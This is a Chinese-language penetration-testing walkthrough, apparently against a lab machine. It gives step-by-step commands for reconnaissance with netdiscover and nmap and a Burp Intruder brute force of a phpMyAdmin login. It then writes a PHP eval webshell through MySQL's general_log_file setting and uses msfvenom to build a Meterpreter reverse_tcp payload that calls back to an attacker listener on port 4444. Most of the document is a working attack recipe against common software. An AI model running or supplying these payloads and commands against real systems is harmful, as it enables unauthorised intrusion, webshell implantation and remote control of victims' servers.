Web渗透测试对靶机注入shell
文章目录
1、寻找目标信息
netdiscover扫描
打开kali,使用root权限,输入命令
netdiscover
目标主机为显示 VMare的IP地址得到目标主机IP地址为:192.168.0.4
nmap扫描
输入命令
nmap -sV -O -T4 192.168.0.4
发现目标主机有端口3306是打开的
利用御剑后台进行扫描
输入域名(就是目标IP地址):192.168.0.4
得到网页地址:phpMyAdmin
网页界面如下
2、对登录页面进行暴力破解
启动burp suite对目标网页进行拦截
对目标进行暴力破解
- 首先,单击【鼠标右键】–【发送给测试器】–点击【Intruder】
- 进入intruder界面后,点击【Positions】
- 然后点击【清除】把变量都清楚了
- 选中【admin】(username和password)后面的值,单击【添加】,把要进行暴力破解的变量进行添加
- 下拉攻击类型选中【Clusterbomb】
- 然后点击【Payload】
- 有效负载集为1载入Username.txt文件中的数据
- 有效负载集为2载入Password.txt文件中的数据
- 然后点击【开始攻击】:程序自动进行暴力破解
- 匹配用户名和密码
- 破解得到用户名为:root
- 密码为:root
3、进入phpmyadmin界面
查看主页信息
对目标信息进行渗透处理
查看日志是否打开
- 点击【变量】
- 查看是否开启日志和日志地址
创建日志文件getshell
进入SQL界面
#set global general_log=on; #开启日志
set global general_log_file = 'C:/phpstudy/www/xxb.php'; #设置指定文件为网址日志存放文件
select '<?php @eval($_POST["xxb"]);?>';
下面图片是先前截的图
再次进入【变量】
把general log_file的路径中的文件名换成刚才新建的文件名
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传
4、用中国蚁剑进行连接
建立连接
注意后缀名和密码
点击测试连接–连接成功–保存这个状态
用kali生成木马文件
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.59.134 LPORT=4444 -f exe -o /home/kali/shell.exe
注意
LHOST的IP地址
和/home/kali/shell.exe的路径和文件名
建议把文件名改成自己想的名字
把生成的文件上传到服务器
用kali进行监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.59.134
set lport 4444
run
用中国蚁剑运行程序
去kali看看
入侵成功
5、后渗透阶段
查看当前角色
getuid